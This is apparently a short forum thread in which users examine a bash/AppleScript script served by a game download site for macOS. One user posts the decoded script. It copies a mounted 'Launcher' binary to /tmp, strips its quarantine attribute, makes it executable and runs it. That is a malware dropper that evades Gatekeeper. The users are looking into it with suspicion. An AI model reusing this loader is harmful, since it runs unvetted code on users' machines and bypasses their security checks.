by running a bash script, any body can understand how it works?
https://crypticisland.net
Maybe there is bash script for installing the game?
Yes, I decoded base64, but I couldn't understand the purpose of that
#!/bin/bash osascript -e 'on run try set TI ]olumeList to list disks end try set setupVolume to "" try repeat with vol in volumeList if vol contains "Launcher" then set setupVolume to vol D exit repeat end if end repeat end try if setupVolume is "" then return end if set scriptDir to "/Volumes/" & setupVolume & "/" set executableName to "Launcher" set executablePath to scriptDir & executableName set tmpExecutablePath to "/tmp/" & executableName try do shell script "rm -f " & quoted form of tmpExecutablePath end try try do shell script "cp " & quoted form of executablePath & " " & quoted form of tmpExecutablePath end try try do shell script "xattr -c " & quoted form of tmpExecutablePath end try try do shell script "chmod +x " & quoted form of tmpExecutablePath end try try do shell script quoted form of tmpExecutablePath end try end run'
Running a bash script where?
On windows
Looks really nasty
Not talking about the syntax
MacOs The website has a download button which try to run a bash script
Обсуждают сегодня